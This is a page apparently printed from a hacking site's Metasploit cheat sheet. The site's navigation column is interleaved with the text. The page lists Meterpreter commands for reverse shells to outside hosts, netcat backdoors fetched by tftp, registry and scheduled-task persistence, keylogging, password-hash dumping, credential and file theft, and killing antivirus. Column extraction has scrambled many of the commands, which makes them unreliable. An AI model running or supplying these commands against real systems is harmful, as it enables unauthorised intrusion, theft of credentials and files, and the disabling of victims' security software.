Metasploit Cheatsheet - HackersOnlineClub

1 of 4

http://www.hackersonlineclub.com/metasploit-tutorial/metasploit-chea...

Home

Metasploit Tutorial >

Advance Operating System

Metasploit Cheatsheet

Advertisement With Us
Android Tools
Anonymous Surfing
BackTrack Tutorial
Books And WhitePapers

Cheat sheet of
Metasploit...
Commands are
as follows ..

You, Rohit Asoliya and 28,329

others like this.

Botnets
Bug Bounty Web List
Bypass Android Pattern lock
Chat with Friends through
Command Prompt
Clickjacking
Computer Forensic Tools And
Tricks
Cross Site Scripting (XSS)
Cryptography
Donate Us
DOS Attacks
Phlashing-PDOS
Earn Bitcoins
Earn Money Online
Email Hacking
Ethical Cracking Training
Course Online
Events
Exploits

use exploit/multi/handler
set PAYLOAD windows/meterpreter
/reverse_tcp
set LHOST rmccurdy.com
set LPORT 21
set ExitOnSession false
# set AutoRunScript pathto script
you want to autorun after exploit is
run
set AutoRunScript persistence -r
75.139.158.51 -p 21 -A -X -i 30

# rev shell the hard way

run scheduleme -m 1 -u /tmp/nc.exe
-o "-e cmd.exe -L -p 8080"
___________________________________

# file_autopwn
rm -Rf /tmp/1
mkdir /tmp/1
rm -Rf ~/.msf3

# vnc / port fwd for linux

run vnc
___________________________________
# priv esc
run kitrap0d

# An example of a run of the file to

download via tftp of Netcat and then
running it as a backdoor.
run schtasksabuse-dev -t 192.168.1.7 -c
"tftp -i 192.168.1.8 GET nc.exe,nc -L -p
8080 -e cmd.exe" -d 4
run schtasksabuse -t 192.168.1.7 -c
exploit -j -z
"tftp -i 192.168.1.8 GET nc.exe,nc -L -p
8080 -e cmd.exe" -d 4
______________________________________________________________
___________________________________

Facebook Tricks
Firefox Imp. Addons
Forensic Tools
Fuzzing
Game CheatCodes

wget -O /tmp/file3.pdf
https://www1.nga.mil/Newsroom
/PressR...s/nga10_02.pdf
./msfconsole

___________________________________

run getgui
___________________________________

Google Hacking
Hack Facebook Account
Hack Instagram Account
Hack PayPal Account
Hack Victim Computer
Hack WhatsApp Account
Hack Windows Admin
Hackers Types
Hacking Tools

db_driver sqlite3
db_create pentest11
setg LHOST 75.139.158.51
setg LPORT 21
setg SRVPORT 21
setg LPORT_WIN32 21

# somewhat broken .. google sdt

cleaner NtTerminateProcess !@?!?!
run killav
run winemun
run memdump

setg INFILENAME /tmp/file3.pdf

use auxiliary/server/file_autopwn

run screen_unlock
___________________________________

set OUTPATH /tmp/1

upload /tmp/system32.exe

Heartbleed OpenSSL Tools

HOC Tools

02-01-2015 22:43

Metasploit Cheatsheet - HackersOnlineClub

2 of 4

HoneyPot
How To Bypass Smartphone
Lock Screen
How To Identify Fake Facebook
Accounts
How To Make Window
Genuiene
How To Remove Facebook
Timeline
Information Security
Install window XP In 10Min.
Internet Guide
Intrusion Detection System
(IDS)
Jailbreak iOS
Job Board
Keylogger Tutorial
Learn TCP/IP
LFI & RFI
Link Partners
MAC Address (Media Access
Control)
Malware Analysis
Metasploit Tutorial
Hack Webcam
Metasploit Cheatsheet
Miscellaneous Tools
Mobile Hack Tricks
Mobile Hacking Tools
Mobile Recharge Free
Mobile Stuff
LG Mobile Codes
Nokia mobile codes
Samsung Mobile Codes
Multi Yahoo&Gtlk
Network Hacking
Open Source Code
Phishing Attacks
Phreaking
Privacy Policy
Proxy Server
Recover Deleted Files
Reverse Engineering
RUN Commands
Search Engine Optimization
(SEO)
Security Projects
Security Tools
Send Fake Mail
Send Fake SMS
Sniffing
Social Engineering
Steganography

http://www.hackersonlineclub.com/metasploit-tutorial/metasploit-chea...

C:\\windows\\system32\\
reg enumkey -k HKLM\\software
\\microsoft\\windows
\\currentversion \\run
reg setval -k HKLM\\software
\\microsoft\\windows
\\currentversion \\run -v system32 -d
"C:\\windows\\system32
\\system32.exe -Ldp 455 -e cmd.exe"
reg queryval -k HKLM\\software
\\microsoft\\windows
\\currentversion \\Run -v system32
______________________________________________________________
reg enumkey -k HKLM\\system
\\controlset001\services
# shows all the scripts
\\sharedaccess \\parameters
run [tab]
\\firewallpolicy\\Standardprofile\\aut
______________________________________________________________
horizedapplications\\list
reg setval -k HKLM\\system
# persistence! broken ...if you use
\\controlset001\services
DNS name ..
\\sharedaccess \\parameters
run persistence -r 75.139.158.51 -p 21 \\firewallpolicy\\Standardprofile\\aut
-A -X -i 30
horizedapplications\\list -v sys
reg queryval -k HKLM\\system
______________________________________________________________
\\controlset001\services
\\sharedaccess \\parameters
run get_pidgin_creds
\\firewallpolicy\\Standardprofile\\aut
horizedapplications\\list -v system32
idletime
upload /neo/wallpaper1.bmp
sysinfo
"C:\\documents and
settings\\pentest3\\local
______________________________________________________________
settings\\application
data\\microsoft\\"
# SYSTEM SHELL ( pick a proc that
is run by system )
___________________________________
migrate 376
shell
getuid
______________________________________________________________
ps
getpid
# session hijack tokens
keyscan_start
use incognito
keyscan_dump
impersonate_token "NT
migrate 520
AUTHORITY\\SYSTEM"
portfwd add -L 104.4.4 -l 6666 -r
______________________________________________________________
192.168.1.1 -p 80"
portfwd add -L 192.168.1.1 -l -r
# escalate to system
10.5.5.5 -p 6666
use priv
___________________________________
getsystem
______________________________________________________________
shell
run myremotefileserver_mserver -h
execute -f cmd.exe -H -c -i -t
run myremotefileserver_mserver -p
execute -f cmd.exe -i -t
8787
______________________________________________________________
___________________________________
set URIPATH /msf
set SSL true
set ExitOnSession false
set PAYLOAD windows/meterpreter
/reverse_tcp
setg PAYLOAD
windows/meterpreter/reverse_tcp
set AutoRunScript persistence -r
75.139.158.51 -p 21 -A -X -i 30
run

# list top used apps

run msf_bind
run prefetchtool -x 20
run msf_bind -p 1975
______________________________________________________________
rev2self
getuid
# list installed apps
___________________________________
run prefetchtool -p
______________________________________________________________
getuid
run get_local_subnets

enumdesktops

02-01-2015 22:43

Metasploit Cheatsheet - HackersOnlineClub

3 of 4

Hide File In Image

http://www.hackersonlineclub.com/metasploit-tutorial/metasploit-chea...

______________________________________________________________
grabdesktop

Tab Napping
Tips & Trickses
To Block Websites
To Create Your Own Social
Network Website
Training & Webinar
VAPT Tools
Virus Types
Virus Writing
Website Hacking
Bypass Web Application
Firewalls
Website Security
Website Security Tools
Wi-Fi Network Hacking
Windows Hacking
YouTube Video Converter

# find and download files

run search_dwld
"%USERPROFILE%\\my
documents" passwd
run search_dwld
"%USERPROFILE%\\desktop
passwd
run search_dwld
"%USERPROFILE%\\my
documents" office
run search_dwld
"%USERPROFILE%\\desktop"
office

run deploymsf -f framework3.3-dev.exe

# does some run wmic commands

etc
run winenum

# Using Payload As A Backdoor from a

shell

run hashdump
run metsvc
run scraper
run checkvm
run keylogrecorder
run netenum -fl -hl localhostlist.txt -d
google.com
run netenum -rl -r
10.192.0.50-10.192.0.254
run netenum -st -d google.com
run netenum -ps -r 10.192.0.50-254
______________________________________________________________
___________________________________
# alternate
download -r
# Windows Login Brute Force
"%USERPROFILE%\\desktop" ~/
Meterpreter Script
download -r
run winbf -h
"%USERPROFILE%\\my
___________________________________
documents" ~/
______________________________________________________________
# upload a script or executable and
run it
# alternate to shell not SYSTEM
uploadexec
# execute -f cmd.exe -H -c -i -t
______________________________________________________________
___________________________________

REG add
HKEY_CURRENT_USER\Software
\Microsoft\Windows\Curre
ntVersion\Run /v firewall /t REG_SZ
/d "c:\windows\system32
\metabkdr.exe" /f
at 19:00 /every:M,T,W,Th,F cmd /c
start
"%USERPROFILE%\metabkdr.exe"
SCHTASKS /Create /RU "SYSTEM"
/SC MINUTE /MO 45 /TN
FIREWALL /TR
"%USERPROFILE%\metabkdr.exe"
/ED 11/11/2011

___________________________________
# kill AV this will not unload it from
mem it needs reboot or kill from
memory still ... Darkspy, Seem,
Icesword GUI can kill the tasks
catchme.exe -K "c:\Program
Files\Kaspersky\avp.exe"
catchme.exe -E "c:\Program
Files\Kaspersky\avp.exe"
catchme.exe -O "c:\Program
Files\Kaspersky\avp.exe" dummy

02-01-2015 22:43

Metasploit Cheatsheet - HackersOnlineClub

4 of 4

http://www.hackersonlineclub.com/metasploit-tutorial/metasploit-chea...

Cheatsheet by Kislay Bhardwaj. He is a Security Researcher Follow:

Facebook , Twitter

PRIYANSHU.

Copyright 2008-2009 Design & Developed By

Site Best viewed in Firefox with 1024x768 screen resolution.

Report Abuse | Print Page | Powered By Google Sites

02-01-2015 22:43